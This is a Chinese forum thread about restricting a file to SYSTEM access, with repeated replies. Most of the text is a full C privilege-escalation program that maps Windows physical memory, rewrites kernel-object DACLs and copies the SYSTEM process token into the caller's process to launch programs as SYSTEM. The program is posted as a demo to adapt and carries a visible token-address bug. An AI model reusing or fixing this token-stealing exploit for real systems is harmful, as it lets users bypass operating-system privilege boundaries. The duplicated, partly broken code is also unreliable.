文件访问权限设置?

时间:2021-09-28 12:50:04
在ntfs盘中,新建了个test.txt,访问权限设置仅仅“SYSTEM”能够访问和修改,其他的组或用户全部删除了。
我在网上找的一个demo,思路是“直接将System进程的Token拿过来,放到我们进程的Token位置。那么系统就认为我们是SYSTEM权限.而这时我们的进程创建的子进程也就是SYSTEM权限了”。

#include<windows.h>
#include<stdio.h>
#include<Accctrl.h>
#include<Aclapi.h>

#define TOKEN_OFFSET 0xc8 //In windows 2003, it's 0xc8, if others' version, change it
#define NT_SUCCESS(Status)            ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH        ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG  NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
    NTSTATUS    Status;
    ULONG        Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
    USHORT        Length;
    USHORT        MaximumLength;
    PWSTR        Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT             0x00000002L
#define OBJ_PERMANENT           0x00000010L
#define OBJ_EXCLUSIVE           0x00000020L
#define OBJ_CASE_INSENSITIVE    0x00000040L
#define OBJ_OPENIF              0x00000080L
#define OBJ_OPENLINK            0x00000100L
#define OBJ_KERNEL_HANDLE       0x00000200L
#define OBJ_VALID_ATTRIBUTES    0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG        Length;
    HANDLE        RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG        Attributes;
    PVOID        SecurityDescriptor;
    PVOID        SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  

typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION )
(
 IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
 IN OUT PVOID SystemInformation,
 IN ULONG SystemInformationLength,
 OUT PULONG ReturnLength OPTIONAL
 );

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
   OUT PHANDLE  SectionHandle,
   IN  ACCESS_MASK  DesiredAccess,
   IN  POBJECT_ATTRIBUTES  ObjectAttributes
   );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(                
  IN OUT PUNICODE_STRING  DestinationString,
  IN PCWSTR  SourceString
  );

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG            ProcessId;
    UCHAR            ObjectTypeNumber;
    UCHAR            Flags;
    USHORT            Handle;
    PVOID            Object;
    ACCESS_MASK        GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

RTLINITUNICODESTRING        RtlInitUnicodeString;
ZWOPENSECTION            ZwOpenSection;
ZWQUERYSYSTEMINFORMATION    ZwQuerySystemInformation = NULL;
HMODULE    g_hNtDLL = NULL;
PVOID     g_pMapPhysicalMemory = NULL;
HANDLE     g_hMPM     = NULL;

BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary( "ntdll.dll" );
    if ( !g_hNtDLL )
    {
        return FALSE;
    }

    RtlInitUnicodeString =
        (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");

    ZwOpenSection =
        (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

    ZwQuerySystemInformation =
        ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );

    ZwQuerySystemInformation = 
        ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );

    return TRUE;
}

VOID CloseNTDLL()
{
    if(g_hNtDLL != NULL)
    {
        FreeLibrary(g_hNtDLL);
    }
}

VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{

    PACL pDacl=NULL;
    PACL pNewDacl=NULL;
    PSECURITY_DESCRIPTOR pSD=NULL;
    DWORD dwRes;
    EXPLICIT_ACCESS ea;

    if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
        NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
    {
        goto CleanUp;
    }

    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance= NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";


    if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
    {
        goto CleanUp;
    }

    if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
    {
        goto CleanUp;
    }

CleanUp:

    if(pSD)
        LocalFree(pSD);
    if(pNewDacl)
        LocalFree(pNewDacl);
}

HANDLE OpenPhysicalMemory()
{
    NTSTATUS        status;
    UNICODE_STRING        physmemString;
    OBJECT_ATTRIBUTES    attributes;

    RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );

    attributes.Length            = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory        = NULL;
    attributes.ObjectName            = &physmemString;
    attributes.Attributes            = 0;
    attributes.SecurityDescriptor        = NULL;
    attributes.SecurityQualityOfService    = NULL;

    status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);

    if(status == STATUS_ACCESS_DENIED){
        status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
    }

    if( !NT_SUCCESS( status ))
    {
        return NULL;
    }

    g_pMapPhysicalMemory = MapViewOfFile(
        g_hMPM,
        4,
        0,
        0x300000,
        0x1000);
    if( g_pMapPhysicalMemory == NULL )
    {
        return NULL;
    }

    return g_hMPM;
}


7 个解决方案

#1



PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
    ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
    if(VAddr>=0x80000000 && VAddr<0xa0000000)
    {
        PAddr=VAddr-0x80000000;
        return (PVOID)PAddr;
    }
    PGDE=BaseAddress[VAddr>>22];
    if ((PGDE&1)!=0)
    {
        ULONG tmp=PGDE&0x00000080;
        if (tmp!=0)
        {
            PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
        }
        else
        {
            PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
            PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
            if ((PTE&1)!=0)
            {
                PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
                UnmapViewOfFile((PVOID)PGDE);
            }
            else return 0;
        }
    }
    else return 0;

    return (PVOID)PAddr;
}



ULONG GetData(PVOID addr)
{
    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
    if (tmp==0)
        return 0;
    ULONG ret=tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}

BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (tmp==0)
        return FALSE;
    tmp[(phys & 0xFFF)>>2]=data;
    UnmapViewOfFile(tmp);
    return TRUE;
}


DWORD MyGetModuleBaseAddress( char * pModuleName)
{
    PSYSTEM_MODULE_INFORMATION    pSysModule;    

    ULONG            uReturn;
    ULONG            uCount;
    PCHAR            pBuffer = NULL;
    PCHAR            pName    = NULL;
    NTSTATUS         status;
    UINT             ui;
    CHAR             szBuffer[10];
    DWORD            pBaseAddress;

    status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
    pBuffer = ( PCHAR )malloc(uReturn);
    if ( pBuffer )
    {
        status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
        if( NT_SUCCESS(status) )
        {
            uCount = ( ULONG )*( ( ULONG * )pBuffer );
            pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
            for ( ui = 0; ui < uCount; ui++ )
            {
                pName = strstr( pSysModule->ImageName, pModuleName );
                if( pName )
                {
                    pBaseAddress = (DWORD)pSysModule->Base;
                    free( pBuffer );
                    return pBaseAddress;
                }
                pSysModule ++;
            }
        }

        free( pBuffer );
    }

    return NULL;
}

DWORD GetEprocessFromId (DWORD PID)
{
    NTSTATUS                     status;
    PVOID                        buf   = NULL;
    ULONG                        size  = 1;
    ULONG                        NumOfHandle = 0;
    ULONG                        i;
    PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;
    DWORD    n;
    DWORD    retvalue=0;

    buf=malloc(0x1000);
    if(buf == NULL)
    {
        printf("malloc wrong\n");
        return FALSE;
    }
    status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
    if(STATUS_INFO_LENGTH_MISMATCH == status)
    {
        free(buf);
        buf=malloc(n);
        if(buf == NULL)
        {
            printf("malloc wrong\n");
            return FALSE;
        }
        status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
    }
    else
    {
        printf("ZwQuerySystemInformation wrong\n");
        return FALSE;
    }

    NumOfHandle = *(ULONG*)buf;

    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

    for(i = 0; i<NumOfHandle ;i++)
    {
if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5  ))
{
retvalue=(DWORD)(h_info[i].Object);
break;
}
    }

    if ( buf != NULL )
    {
        free( buf );
    }
    return retvalue;
}

void usage(char *exe)
{
    printf("Usage : %s [exefile|-h]\n");
}

int main(int argc, char **argv)
{
    HMODULE hDll;
    DWORD tmp;
    DWORD SystemEprocess;
    DWORD SystemEprocessTokenValue;
    DWORD CurrentEprocess;
    DWORD CurrentEprocessTokenValue;

    printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");
    printf("\tMade by ZwelL.\n");
    printf("\tZwell@sohu.com.\n");
    printf("\thttp://www.donews.net/zwell.\n");
    printf("\tType -h to get more information\n", argv[0]);

    if( argc>=2)
    {
        if(
            ( (strcmp(argv[1],"-h")==0) && (argc==2))
            || (argc>2) 
)
        {
            usage(argv[0]);
            exit(-1);
        }
    }

    if (!InitNTDLL())
    {
        printf("InitNTDLL wrong\n");
        exit(-1);
    }

    if (OpenPhysicalMemory()==0)
    {
        printf("OpenPhysicalMemory wrong\n");
        exit(-1);
    }

// 得到PsInitialSystemProcess的线性地址
    hDll = LoadLibrary("ntoskrnl.exe");
    tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");
    tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;

    // 把现线性地址转化为物理地址,得到SYSTEM的EPROCESS的物理地址
    SystemEprocess = GetData((PVOID)tmp);
    tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM's Token address

// 得到SYSTEM的EPROCESS中Token的物理地址
    SystemEprocessTokenValue = GetData((PVOID)tmp);   //SYSTEM's Token
    printf("System Process Token : %08X\n", SystemEprocessTokenValue);

    OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
    CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());
    CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));

    printf("Current EPROCESS : %08x\n", CurrentEprocess);
    printf("Current Process Token : %08x\n", 
        CurrentEprocessTokenValue);
  
// 修改当前进程的token,使其具有system权限
    if(!SetData((PVOID)(CurrentEprocessTokenValue), SystemEprocessTokenValue))
{
printf("SetData Error\n");
}

    printf("Current Process Token : %08x\n", 
        GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));

printf("Current CurrentEprocess Token : %08x\n",GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET)));
printf("Current SystemEprocess Token : %08x\n",GetData((PVOID)(SystemEprocess+TOKEN_OFFSET)));

// 系统的token随时在变,所以在执行程序之前要再检查一下
    if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET)) 
        == GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))  
        ) 
        // It is so surprised that SYSTEM's Token always in changing. 
        // So before create new process, we should ensure the TOKEN is all right
    {
        ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\notepad.exe", NULL, NULL, SW_SHOWNORMAL);
    }


    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL();

    return 0;
}

#2


拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...

#3


问题出现在 SetData 函数,无法将 SystemEprocessTokenValue 替换 CurrentEprocessTokenValue。
求高手指点~

#4


引用 2 楼 oyljerry 的回复:
拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...


您的意思是:我现在用计算机管理员的权限运行这个代码 ,不足以拿到 SYSTEM 的权限?有没有可能用用计算机管理员的权限实现这样的要求呢?若可以,求一个解决方案?

还是将这个代码做成系统服务?

#5


引用 4 楼 XD19861130 的回复:
引用 2 楼 oyljerry 的回复:
拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...


您的意思是:我现在用计算机管理员的权限运行这个代码 ,不足以拿到 SYSTEM 的权限?有没有可能用用计算机管理员的权限实现这样的要求呢?若可以,求一个解决方案?

还是将这个代码做成系统服务?

你想想,显然不会一个管理权限的程序拿到SYSTEM权限..不然系统会有Security issue...改成系统Service吧

#6


其实  我是想通过程序创建一个文件夹,并且设置它的访问权限只有 SYSTEM 。
我的思路是使用 CreateDirectory 先建好文件夹,再通过 SetSecurityInfo 设置访问权限,
但是不清楚 SetSecurityInfo 的参数该如何设置 ,恳请高手指点迷津!

#7


 问题已解决,事实上是可以用较低权限拿到高级权限的

#1



PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
    ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
    if(VAddr>=0x80000000 && VAddr<0xa0000000)
    {
        PAddr=VAddr-0x80000000;
        return (PVOID)PAddr;
    }
    PGDE=BaseAddress[VAddr>>22];
    if ((PGDE&1)!=0)
    {
        ULONG tmp=PGDE&0x00000080;
        if (tmp!=0)
        {
            PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
        }
        else
        {
            PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
            PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
            if ((PTE&1)!=0)
            {
                PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
                UnmapViewOfFile((PVOID)PGDE);
            }
            else return 0;
        }
    }
    else return 0;

    return (PVOID)PAddr;
}



ULONG GetData(PVOID addr)
{
    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
    if (tmp==0)
        return 0;
    ULONG ret=tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}

BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    if (tmp==0)
        return FALSE;
    tmp[(phys & 0xFFF)>>2]=data;
    UnmapViewOfFile(tmp);
    return TRUE;
}


DWORD MyGetModuleBaseAddress( char * pModuleName)
{
    PSYSTEM_MODULE_INFORMATION    pSysModule;    

    ULONG            uReturn;
    ULONG            uCount;
    PCHAR            pBuffer = NULL;
    PCHAR            pName    = NULL;
    NTSTATUS         status;
    UINT             ui;
    CHAR             szBuffer[10];
    DWORD            pBaseAddress;

    status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
    pBuffer = ( PCHAR )malloc(uReturn);
    if ( pBuffer )
    {
        status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
        if( NT_SUCCESS(status) )
        {
            uCount = ( ULONG )*( ( ULONG * )pBuffer );
            pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
            for ( ui = 0; ui < uCount; ui++ )
            {
                pName = strstr( pSysModule->ImageName, pModuleName );
                if( pName )
                {
                    pBaseAddress = (DWORD)pSysModule->Base;
                    free( pBuffer );
                    return pBaseAddress;
                }
                pSysModule ++;
            }
        }

        free( pBuffer );
    }

    return NULL;
}

DWORD GetEprocessFromId (DWORD PID)
{
    NTSTATUS                     status;
    PVOID                        buf   = NULL;
    ULONG                        size  = 1;
    ULONG                        NumOfHandle = 0;
    ULONG                        i;
    PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;
    DWORD    n;
    DWORD    retvalue=0;

    buf=malloc(0x1000);
    if(buf == NULL)
    {
        printf("malloc wrong\n");
        return FALSE;
    }
    status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
    if(STATUS_INFO_LENGTH_MISMATCH == status)
    {
        free(buf);
        buf=malloc(n);
        if(buf == NULL)
        {
            printf("malloc wrong\n");
            return FALSE;
        }
        status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
    }
    else
    {
        printf("ZwQuerySystemInformation wrong\n");
        return FALSE;
    }

    NumOfHandle = *(ULONG*)buf;

    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

    for(i = 0; i<NumOfHandle ;i++)
    {
if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5  ))
{
retvalue=(DWORD)(h_info[i].Object);
break;
}
    }

    if ( buf != NULL )
    {
        free( buf );
    }
    return retvalue;
}

void usage(char *exe)
{
    printf("Usage : %s [exefile|-h]\n");
}

int main(int argc, char **argv)
{
    HMODULE hDll;
    DWORD tmp;
    DWORD SystemEprocess;
    DWORD SystemEprocessTokenValue;
    DWORD CurrentEprocess;
    DWORD CurrentEprocessTokenValue;

    printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");
    printf("\tMade by ZwelL.\n");
    printf("\tZwell@sohu.com.\n");
    printf("\thttp://www.donews.net/zwell.\n");
    printf("\tType -h to get more information\n", argv[0]);

    if( argc>=2)
    {
        if(
            ( (strcmp(argv[1],"-h")==0) && (argc==2))
            || (argc>2) 
)
        {
            usage(argv[0]);
            exit(-1);
        }
    }

    if (!InitNTDLL())
    {
        printf("InitNTDLL wrong\n");
        exit(-1);
    }

    if (OpenPhysicalMemory()==0)
    {
        printf("OpenPhysicalMemory wrong\n");
        exit(-1);
    }

// 得到PsInitialSystemProcess的线性地址
    hDll = LoadLibrary("ntoskrnl.exe");
    tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");
    tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;

    // 把现线性地址转化为物理地址,得到SYSTEM的EPROCESS的物理地址
    SystemEprocess = GetData((PVOID)tmp);
    tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM's Token address

// 得到SYSTEM的EPROCESS中Token的物理地址
    SystemEprocessTokenValue = GetData((PVOID)tmp);   //SYSTEM's Token
    printf("System Process Token : %08X\n", SystemEprocessTokenValue);

    OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
    CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());
    CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));

    printf("Current EPROCESS : %08x\n", CurrentEprocess);
    printf("Current Process Token : %08x\n", 
        CurrentEprocessTokenValue);
  
// 修改当前进程的token,使其具有system权限
    if(!SetData((PVOID)(CurrentEprocessTokenValue), SystemEprocessTokenValue))
{
printf("SetData Error\n");
}

    printf("Current Process Token : %08x\n", 
        GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));

printf("Current CurrentEprocess Token : %08x\n",GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET)));
printf("Current SystemEprocess Token : %08x\n",GetData((PVOID)(SystemEprocess+TOKEN_OFFSET)));

// 系统的token随时在变,所以在执行程序之前要再检查一下
    if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET)) 
        == GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))  
        ) 
        // It is so surprised that SYSTEM's Token always in changing. 
        // So before create new process, we should ensure the TOKEN is all right
    {
        ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\notepad.exe", NULL, NULL, SW_SHOWNORMAL);
    }


    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL();

    return 0;
}

#2


拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...

#3


问题出现在 SetData 函数,无法将 SystemEprocessTokenValue 替换 CurrentEprocessTokenValue。
求高手指点~

#4


引用 2 楼 oyljerry 的回复:
拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...


您的意思是:我现在用计算机管理员的权限运行这个代码 ,不足以拿到 SYSTEM 的权限?有没有可能用用计算机管理员的权限实现这样的要求呢?若可以,求一个解决方案?

还是将这个代码做成系统服务?

#5


引用 4 楼 XD19861130 的回复:
引用 2 楼 oyljerry 的回复:
拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...


您的意思是:我现在用计算机管理员的权限运行这个代码 ,不足以拿到 SYSTEM 的权限?有没有可能用用计算机管理员的权限实现这样的要求呢?若可以,求一个解决方案?

还是将这个代码做成系统服务?

你想想,显然不会一个管理权限的程序拿到SYSTEM权限..不然系统会有Security issue...改成系统Service吧

#6


其实  我是想通过程序创建一个文件夹,并且设置它的访问权限只有 SYSTEM 。
我的思路是使用 CreateDirectory 先建好文件夹,再通过 SetSecurityInfo 设置访问权限,
但是不清楚 SetSecurityInfo 的参数该如何设置 ,恳请高手指点迷津!

#7


 问题已解决,事实上是可以用较低权限拿到高级权限的